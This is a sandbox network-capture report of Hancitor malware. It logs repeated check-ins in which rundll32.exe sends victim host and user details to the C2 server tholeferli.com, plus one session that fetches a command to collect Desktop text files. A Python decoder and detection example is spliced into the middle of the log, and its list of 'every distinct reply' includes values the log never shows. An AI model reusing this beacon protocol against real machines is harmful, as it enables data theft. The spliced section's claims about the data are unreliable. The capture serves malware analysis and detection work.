                                                Date: Thu, 22 Jul 2021 14:11:04 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 33 63 0d 0a 41 47 54 5a 41 52 68 41 45 67 34 4f 43 6b 42 56 56 51 6c 4b 46 68 55 58 53 68 52 55 43 41 39 56 54 52 49 4a 45 42 77 65 51 77 31 4f 43 42 38 63 43 52 35 55 48 77 49 66 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 3cAGTZARhAEg4OCkBVVQlKFhUXShRUCA9VTRIJEBweQw1OCB8cCR5UHwIfBw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                10 | 192.168.2.22 | 49177 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:07.833553076 CEST | 302 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:07.989145994 CEST | 307 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4d 4e 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBMNYARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                100 | 192.168.2.22 | 49267 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:53.939415932 CEST | 407 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:54.094969988 CEST | 407 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAZAZARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                101 | 192.168.2.22 | 49268 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:54.388947964 CEST | 408 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:54.559727907 CEST | 409 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:54 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZYBAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                102 | 192.168.2.22 | 49269 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:54.844944954 CEST | 409 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:55.013587952 CEST | 410 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:54 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBBYYARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                103 | 192.168.2.22 | 49270 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:55.295556068 CEST | 410 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:55.465261936 CEST | 411 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:55 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYVEBARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                104 | 192.168.2.22 | 49271 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:55.757966042 CEST | 412 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:55.931896925 CEST | 412 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:55 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZAZAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                105 | 192.168.2.22 | 49272 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:56.205395937 CEST | 413 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:56.361907959 CEST | 413 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:56 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cACXZARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                106 | 192.168.2.22 | 49273 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:56.635381937 CEST | 414 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:56.791811943 CEST | 414 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:56 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHFUSARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                107 | 192.168.2.22 | 49274 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:57.102598906 CEST | 415 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:57.259892941 CEST | 415 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:57 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4d 4e 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQMNJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                108 | 192.168.2.22 | 49275 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:57.540949106 CEST | 416 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:57.710549116 CEST | 416 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:57 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 47 54 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAGTZARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                109 | 192.168.2.22 | 49276 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:57.977777958 CEST | 417 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:58.146398067 CEST | 418 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:58 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMAZNARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                11 | 95.213.179.67 | 80 | 192.168.2.22 | 49178 | C:\Windows\SysWOW64\svchost.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:08.151878119 CEST | 307 | IN | Data Raw: 00 27 00 00 00 01 00 00 00 15 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 65 73 6b 74 6f 70 00 00 00 05 2a 2e 74 78 74 05
                                                Data Ascii: '%userprofile%\Desktop*.txt
                                                Jul 22, 2021 16:11:08.152290106 CEST | 307 | OUT | Data Raw: 0c 00 0f 0a 0b 0a 0b 0a
                                                Data Ascii:
                                                Jul 22, 2021 16:11:08.152462006 CEST | 307 | OUT | Data Raw: 00 00 00 14 09 0a 0a 0a 1a 7a 65 79
                                                Data Ascii: zey
                                                Jul 22, 2021 16:11:08.152494907 CEST | 307 | OUT | Data Raw: 7a 7c 63 79 63 79 24 69 65 67 30 32 3a
                                                Data Ascii: z|cycy$ieg02:
                                                Jul 22, 2021 16:11:08.152674913 CEST | 307 | OUT | Data Raw: 00 00 00 0b 0a 0a 0a 0a
                                                Data Ascii:
                                                Jul 22, 2021 16:11:08.152766943 CEST | 307 | OUT | Data Raw: 0d 7a 65 7a 7a 7f 79 62
                                                Data Ascii: zezzyb
                                                Jul 22, 2021 16:11:08.270020008 CEST | 308 | IN | Data Raw: 00 00 00 04 00 00 00 00
                                                Data Ascii:


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                110 | 192.168.2.22 | 49277 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:58.418962955 CEST | 418 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:58.575879097 CEST | 419 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:58 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBNMYARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                111 | 192.168.2.22 | 49278 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:58.852397919 CEST | 419 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:59.010420084 CEST | 420 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:58 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNHSMARRABw==0
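Every session in this stretch is the same Hancitor check-in: rundll32.exe POSTs a 110-byte form-urlencoded body (GUID, BUILD, INFO, EXT, IP, TYPE, WIN, always in that order) to /8/forum.php on tholeferli.com and receives a 12-byte chunked reply whose last eight base64 characters, ARRABw==, never change while the first four do. The decoder below is an added example written for this report; it is not the sandbox's code and not the malware's. It is fed the request and response bytes copied from session 111's Data Raw lines, and it assumes the reply encoding commonly documented for Hancitor (base64, then XOR of every byte with 0x7A); that assumption is checked by requiring the braces of a {letter:argument} command to appear after decoding. One caveat when pulling indicators from this report: the Data Ascii rendering substitutes user-PC\user for the machine name, while the hex still reads ALBUS-PC\Albus, so parse the hex rather than the ASCII line. The function names parse_checkin, looks_like_hancitor_checkin, dechunk, decode_reply and commands_seen are this example's own.

```python
"""Parse a Hancitor check-in and decode the C2 reply (added example, not report code)."""
import base64
import re
from urllib.parse import parse_qs

XOR_KEY = 0x7A  # assumption: the reply key commonly documented for Hancitor

# Constructed from the report's session 111 "Data Raw" lines. The request body
# is 110 bytes, matching the Content-Length header in the same session.
REQUEST_BODY_HEX = (
    "47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34"
    " 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d"
    " 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26"
    " 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d"
    " 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29"
)
RESPONSE_BODY_HEX = "63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"

# Every session on the page sends these seven fields in exactly this order.
CHECKIN_FIELDS = ["GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN"]

# Every distinct reply body seen in the report, chunk framing stripped.
REPLIES = [b"BNMYARRABw==", b"NHSMARRABw==", b"AKPZARRABw==", b"FJQUARRABw==",
           b"QGTJARRABw==", b"YCXBARRABw==", b"ZZAAARRABw==", b"KYBPARRABw==",
           b"NKPMARRABw==", b"BJQYARRABw==", b"TCXGARRABw==", b"GNMTARRABw==",
           b"GMNTARRABw==", b"QVEJARRABw==", b"JNMQARRABw=="]


def parse_checkin(body: bytes) -> dict:
    """Split the x-www-form-urlencoded check-in into fields; EXT is legitimately empty."""
    parsed = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def looks_like_hancitor_checkin(body: bytes) -> bool:
    """Detection predicate over the POST body: the Hancitor field names in Hancitor's
    order, INFO shaped 'host @ machine\\user', numeric TYPE, WIN like '6.1(x64)'."""
    names = [part.split("=", 1)[0] for part in body.decode("latin-1").split("&")]
    if names != CHECKIN_FIELDS:
        return False
    fields = parse_checkin(body)
    return (" @ " in fields["INFO"] and "\\" in fields["INFO"]
            and fields["TYPE"].isdigit()
            and re.fullmatch(r"\d+\.\d+\(\w+\)", fields["WIN"]) is not None)


def dechunk(raw: bytes) -> bytes:
    """Minimal HTTP/1.1 chunked transfer-encoding decoder (sizes are hex, CRLF framed)."""
    out, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return out
        out += raw[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def decode_reply(b64_text: bytes):
    """Return (prefix_bytes, command_letter, argument) from one C2 reply.

    The three bytes before '{' differ in every reply on the page; they are
    returned untouched and only the braced {letter:argument} part is parsed."""
    plain = bytes(b ^ XOR_KEY for b in base64.b64decode(b64_text))
    start, end = plain.find(b"{"), plain.rfind(b"}")
    if start < 0 or end < start:
        raise ValueError("no {..} command after decoding; the XOR-key assumption failed")
    letter, _, argument = plain[start + 1:end].decode("latin-1").partition(":")
    return plain[:start], letter, argument


def commands_seen(replies=REPLIES):
    """Distinct (letter, argument) pairs across all replies captured in the report."""
    return sorted({decode_reply(reply)[1:] for reply in replies})


if __name__ == "__main__":
    body = bytes.fromhex(REQUEST_BODY_HEX)
    print(len(body), parse_checkin(body), looks_like_hancitor_checkin(body))
    prefix, letter, argument = decode_reply(dechunk(bytes.fromhex(RESPONSE_BODY_HEX)))
    print(prefix.hex(), letter, repr(argument), commands_seen())
```

Run stand-alone it prints the seven parsed fields and decodes all fifteen distinct replies on the page to the same command, the letter n with an empty argument. Hancitor's other documented command letters carry a URL after the colon, so an empty n is read here as an idle reply; that reading is an assumption, since the report itself only shows that no follow-on download occurred in these sessions. The varying three-byte prefix is left uninterpreted.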


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                112 | 192.168.2.22 | 49279 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
